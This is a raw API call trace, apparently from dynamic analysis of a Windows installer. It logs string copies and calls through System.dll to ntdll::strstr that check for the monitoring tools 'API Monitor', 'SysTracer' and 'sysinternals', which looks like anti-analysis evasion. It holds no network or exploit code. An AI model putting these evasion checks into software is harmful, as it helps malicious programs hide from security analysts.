lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.489] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.489] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.489] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.489] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.490] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.490] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.490] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.490] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.490] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.490] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.490] lstrcpynA (in: lpString1=0x3401e0, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.490] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.490] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.490] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.490] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.490] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.490] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.490] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.490] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.490] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.491] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.491] lstrlenA (lpString="0") returned 1 [0158.491] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.491] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.491] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.491] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.491] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.491] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.491] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.491] lstrlenA (lpString="0") returned 1 [0158.491] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.491] lstrlenA (lpString="") returned 0 [0158.491] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.491] lstrcpynA (in: lpString1=0x337684, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.491] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.491] lstrlenA (lpString="3399936") returned 7 [0158.491] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.491] lstrcpynA (in: lpString1=0x40a418, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.491] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.491] lstrcpynA (in: lpString1=0x337acc, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.491] lstrcpynA (in: lpString1=0x432800, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.491] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.491] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.491] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.492] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.492] lstrlenA (lpString="") returned 0 [0158.492] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.492] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.492] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.492] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.492] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.492] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.492] lstrlenA (lpString="") returned 0 [0158.492] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.492] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.492] lstrlenA (lpString="") returned 0 [0158.492] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.492] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.492] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.493] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.493] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.493] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.493] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.493] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.493] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.493] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.493] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.493] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.493] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.493] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.493] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.494] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.494] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.494] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.494] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.494] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.494] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.494] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.494] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.494] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.494] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.494] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.494] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.494] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.494] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.494] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.494] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.495] lstrlenA (lpString="0") returned 1 [0158.495] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.495] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.495] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.495] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.495] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.495] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.495] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.495] lstrlenA (lpString="0") returned 1 [0158.495] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.495] lstrlenA (lpString="") returned 0 [0158.495] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.495] lstrcpynA (in: lpString1=0x337684, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.495] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.495] lstrlenA (lpString="3399936") returned 7 [0158.495] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.495] lstrcpynA (in: lpString1=0x40a418, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.495] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.495] lstrcpynA (in: lpString1=0x337acc, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.495] lstrcpynA (in: lpString1=0x432800, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.495] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.495] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.495] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.495] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.495] lstrlenA (lpString="") returned 0 [0158.495] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.496] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.496] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.496] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.496] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.496] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.496] lstrlenA (lpString="") returned 0 [0158.496] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.496] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.496] lstrlenA (lpString="") returned 0 [0158.496] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.496] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.496] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.496] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.496] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.496] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.496] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.496] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.496] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.496] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.496] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.496] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.497] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.497] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.497] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.497] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.497] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.497] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.497] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.497] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.497] lstrcpynA (in: lpString1=0x3401e0, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.497] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.497] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.497] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.497] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.497] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.497] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.498] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.498] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.498] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.498] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.498] lstrlenA (lpString="0") returned 1 [0158.498] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.498] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.498] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.498] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.498] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.498] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.498] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.498] lstrlenA (lpString="0") returned 1 [0158.498] lstrcpynA (in: lpString1=0x33723c, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.498] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.498] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.498] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.498] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.498] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.498] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.498] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.498] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.498] lstrlenA (lpString="3399936") returned 7 [0158.498] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.499] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.499] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.499] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.499] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.499] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.499] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.499] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.499] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.499] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.499] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65690") returned 5 [0158.499] lstrcpyA (in: lpString1=0x430400, lpString2="65690" | out: lpString1="65690") returned="65690" [0158.499] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.499] lstrcpynA (in: lpString1=0x33723c, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.499] lstrcpynA (in: lpString1=0x430000, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.499] lstrcpynA (in: lpString1=0x42e3a0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.499] lstrlenA (lpString="callback1") returned 9 [0158.499] lstrcpynA (in: lpString1=0x40ac18, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.499] lstrcpynA (in: lpString1=0x40b018, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.499] lstrcmpiA (lpString1="callback1", lpString2="callback1") returned 0 [0158.499] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.499] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.499] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.500] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.500] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.500] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.500] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", 